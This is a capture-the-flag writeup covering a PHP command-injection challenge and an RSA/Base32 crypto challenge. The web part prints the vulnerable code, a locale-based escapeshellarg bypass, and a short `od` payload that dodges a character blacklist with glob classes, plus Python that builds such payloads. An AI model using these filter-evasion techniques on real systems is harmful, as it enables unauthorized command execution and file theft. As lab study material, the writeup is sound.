2021广东强网杯 | WEB and Crypto Writeups

Category: CTF

# WEB


## love_Pokemon

```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}

// Blacklist: most letters, every quoting/globbing metacharacter and the word "flag".
// (The backslash escapes inside the pattern are restored here; the page copy had lost them.)
function DefenderBonus($Pokemon){
    if(preg_match("/'|\"|_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\+|\^|`|~|\\||\"|<|>|=|{|}|!|&|\\*|\\?|\\(|\\)/i",$Pokemon)){
        die('catch broken Pokemon! mew-_-two');
    }
    else{
        return $Pokemon;
    }
}
function ghostpokemon($Pokemon){
    if(is_array($Pokemon)){
        foreach ($Pokemon as $key => $pks) {
            $Pokemon[$key] = DefenderBonus($pks);
        }
    }
    else{
        $Pokemon = DefenderBonus($Pokemon);
    }
}
switch($_POST['myfavorite'] ?? ""){
    case 'picacu!':
        echo md5('picacu!').md5($_SERVER['REMOTE_ADDR']);
        break;
    case 'bulbasaur!':
        echo md5('miaowa!').md5($_SERVER['REMOTE_ADDR']);
        $level = $_POST["levelup"] ?? "";
        if ((!preg_match('/lv100/i',$level)) &&(preg_match('/lv100/i',escapeshellarg($level)))){
            echo file_get_contents('./hint.php');
        }
        break;
    case 'squirtle':
        echo md5('jienijieni!').md5($_SERVER['REMOTE_ADDR']);
        break;
    case 'mewtwo':
        $dream = $_POST["dream"] ?? "";
        if(strlen($dream)>=20){
            die("So Big Pokenmon!");
        }
        ghostpokemon($dream);
        echo shell_exec($dream);
}
?>
```
hint.php is only served when `levelup` fails the first regex on the raw value but matches it after `escapeshellarg()`:

```php
if ((!preg_match('/lv100/i',$level)) &&(preg_match('/lv100/i',escapeshellarg($level))))
```

`escapeshellarg()` silently drops bytes that are not valid characters in the current locale (in the default C locale that is every byte from 0x80 upwards), so `lv\x81100` does not match `/lv100/i` as submitted, but does once the 0x81 byte has been stripped:

```
myfavorite=bulbasaur%21&levelup=lv%81100
```

The response is `md5('miaowa!')`, the MD5 of the client IP, and then the contents of hint.php:

```
2f4850466af6a0a50752be95d64c997672baa2980ee888c9daa9d389227c3724<?php$hint = 'flag is located in / , and NAME IS FLAG';
```

So the flag file is `/FLAG`, with an all-uppercase name.

Fuzzing the file-reading commands shows that `od` survives the blacklist: the only lowercase letters it allows are b, c, d, f, g, o, q, x, y and z, so `cat`, `head`, `tac`, `less` and friends all die. The banned letters `L` and `A` in the file name are dodged with a shell glob class `[@-Z]` (none of `@`, `-`, `Z` is blacklisted, and the hint says the name is uppercase). A tab (`%09`) separates command and argument, and the whole command is 16 bytes, under the 20-byte limit:

```
myfavorite=mewtwo&dream=od%09/F[@-Z][@-Z]G
```

`od` with no options prints octal offsets followed by the file as little-endian 16-bit words in octal:

```
0000000 066146 063541 050173 070150 051137 031543 030537 057563
0000020 031526 074522 041537 030060 057461 072502 057564 057511
0000040 030154 031566 050137 065557 066545 067157 076576 000012
0000057
```
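To see exactly why this command gets through, here is an added Python emulation of the `dream` filter (my own code, not part of the writeup): the blacklist transcribed from `DefenderBonus()` as a Python regex, the `strlen < 20` check, the set of letters a command may be spelled from, and a helper that turns an uppercase path into the `[@-Z]` glob the payload uses. The glob substitution assumes, as hint.php states, that the file name is uppercase; the function and constant names are mine.

```python
import re
import string

# DefenderBonus() blacklist from the challenge, transcribed to Python regex syntax:
# one character class instead of PHP's alternation, same characters, same
# case-insensitive match, with the multi-character token "flag" kept as an alternative.
BLACKLIST = re.compile(r"""['"_$;lsatmrejknwi\\phuv+^`~|<>={}!&*?()]|flag""", re.IGNORECASE)
MAX_LEN = 20          # strlen($dream) >= 20 dies before the filter even runs
WILDCARD = "[@-Z]"    # shell glob class; none of '@', '-', 'Z' is blacklisted


def is_allowed(cmd: str) -> bool:
    """Would this value of $dream reach shell_exec()? Mirrors the length check and DefenderBonus()."""
    return len(cmd.encode()) < MAX_LEN and BLACKLIST.search(cmd) is None


def allowed_letters() -> str:
    """Lowercase letters that survive the blacklist; a command name must be spelled from these."""
    return "".join(c for c in string.ascii_lowercase if BLACKLIST.search(c) is None)


def build_glob(path: str) -> str:
    """Replace every blacklisted character of an UPPERCASE path with the [@-Z] glob class.

    Assumption (from hint.php): the file name is uppercase, so [@-Z] can stand in for
    any blocked letter without also matching lowercase siblings in the directory.
    """
    return "".join(c if BLACKLIST.search(c) is None else WILDCARD for c in path)


def build_payload(path: str, reader: str = "od") -> str:
    """Value for the `dream` parameter; a tab separates command and argument as in the writeup."""
    cmd = f"{reader}\t{build_glob(path)}"
    if not is_allowed(cmd):
        raise ValueError(f"payload rejected by the emulated filter: {cmd!r}")
    return cmd


if __name__ == "__main__":
    print("letters that survive the blacklist:", allowed_letters())
    print("payload:", repr(build_payload("/FLAG")))
    # A few rejected variants: banned letters, the word "flag", and the length limit
    for bad in ("cat /flag", "od /FLAG", "od\t/F[@-Z][@-Z]G\t/F[@-Z][@-Z]G"):
        print(f"{bad!r:40} allowed={is_allowed(bad)}")
```

`allowed_letters()` returning `bcdfgoqxyz` is the whole reason `od` is the reader of choice; `build_payload("/FLAG")` reproduces the writeup's `od\t/F[@-Z][@-Z]G` and raises for anything the emulated filter would kill.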

Convert the octal words back to bytes with the script from https://rainbowpigeon.netlify.app/posts/zh3r0ctf-2021/#strpos-and-substr to get the flag. The version below recognises the offset column by its width (7 octal digits) instead of the original `len(hex(n)) > 4` heuristic, which also silently dropped any data word below 0x100, such as the trailing newline:

```python
# Turn default `od` output (octal offsets, little-endian 16-bit words in octal) back into bytes
dump = """0000000 066146 063541 050173 070150 051137 031543 030537 057563
0000020 031526 074522 041537 030060 057461 072502 057564 057511
0000040 030154 031566 050137 065557 066545 067157 076576 000012
0000057"""

result = bytearray()
for tok in dump.split():
    if len(tok) == 7:                      # 7-digit tokens are file offsets, not data
        continue
    word = int(tok, 8)                     # 6-digit token: one 16-bit word
    result += word.to_bytes(2, "little")   # low byte first undoes od's byte swap

print(result.rstrip(b"\x00").decode())     # od pads a final odd byte with 0x00
```



# Crypto


## rsa and base?

```
BASE:"GHI45FQRSCX****UVWJK67DELMNOPAB3"
flag{TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG====}
```

After the Wiener attack (the RSA stage) what is left is Base32 with a substituted alphabet. Four positions of the table are unknown (`****`) and have to be brute-forced, but a Base32 alphabet holds exactly 32 distinct symbols, so the only candidates are the four standard characters that do not appear in the given table: T, Y, Z and 2. The right decoding is recognised by the substring `rsa_and_base`.

```python
import base64
from itertools import permutations

STANDARD_ALPHABET = b'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
# The four standard characters missing from the given table fill the four '*' slots
MISSING = 'TYZ2'
CIPHERTEXT = b'TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG===='


def recover():
    """Try every ordering of the missing characters; return decodings carrying the marker."""
    found = []
    for answer in permutations(MISSING):
        custom = 'GHI45FQRSCX' + ''.join(answer) + 'UVWJK67DELMNOPAB3'
        CUSTOM_ALPHABET = custom.encode()
        # Map the custom table back onto the standard one, then use the stock decoder
        DECODE_TRANS = bytes.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
        flag = base64.b32decode(CIPHERTEXT.translate(DECODE_TRANS))
        # Wrong orderings that still contain the marker produce non-printable tails
        if b'rsa_and_base' in flag and flag.isascii() and flag.decode().isprintable():
            found.append(flag)
    return found


if __name__ == '__main__':
    for flag in recover():
        print(flag)
```
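The writeup names the Wiener attack for the RSA stage but does not show it, and the challenge's key is not on the page. The following is an added Python example (my own code, not the writeup's) of the attack on a constructed key: primes 1000000007 and 998244353 with private exponent d = 101, chosen so that d < N^(1/4)/3 and q < p < 2q, which is Wiener's condition. Because e*d = 1 + k*phi with k < d, the fraction k/d is a convergent of the continued fraction of e/N; each convergent is tested by deriving phi and checking that p and q come out as integers.

```python
from math import isqrt


def continued_fraction(num, den):
    """Partial quotients [a0; a1, a2, ...] of num/den, via Euclid's algorithm."""
    quotients = []
    while den:
        q, r = divmod(num, den)
        quotients.append(q)
        num, den = den, r
    return quotients


def convergents(quotients):
    """Yield the successive convergents (numerator, denominator), already in lowest terms."""
    n_prev, n = 0, 1
    d_prev, d = 1, 0
    for a in quotients:
        n_prev, n = n, a * n + n_prev
        d_prev, d = d, a * d + d_prev
        yield n, d


def wiener_attack(N, e):
    """Return the private exponent d when d < N**0.25 / 3 (Wiener's bound), else None."""
    for k, d in convergents(continued_fraction(e, N)):
        if k == 0 or (e * d - 1) % k:
            continue                      # k/d cannot satisfy e*d - 1 = k*phi
        phi = (e * d - 1) // k
        s = N - phi + 1                   # would equal p + q
        disc = s * s - 4 * N              # would equal (p - q)^2
        if disc < 0:
            continue
        r = isqrt(disc)
        # Integer roots of x^2 - s*x + N, plus an RSA round trip, confirm the candidate
        if r * r == disc and (s + r) % 2 == 0 and pow(pow(2, e, N), d, N) == 2:
            return d
    return None


def make_vulnerable_key(p, q, d):
    """Constructed demo key (not the challenge's): a tiny d forces a huge e."""
    phi = (p - 1) * (q - 1)
    e = pow(d, -1, phi)                   # needs gcd(d, phi) == 1 and Python >= 3.8
    return p * q, e


if __name__ == "__main__":
    N, e = make_vulnerable_key(1000000007, 998244353, 101)
    print("N =", N)
    print("e =", e)
    print("recovered d =", wiener_attack(N, e))
```

With the recovered d the challenge's RSA ciphertext would decrypt to the `BASE:"..."` table and the Base32 string above; in a real key e is typically 65537 and d is as large as N, which is exactly why this attack finds nothing there.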



Originally published on the WeChat public account 山石网科安全技术研究院 (Hillstone Networks Security Research Institute): 2021广东强网杯|WEB及Crypto方向WP
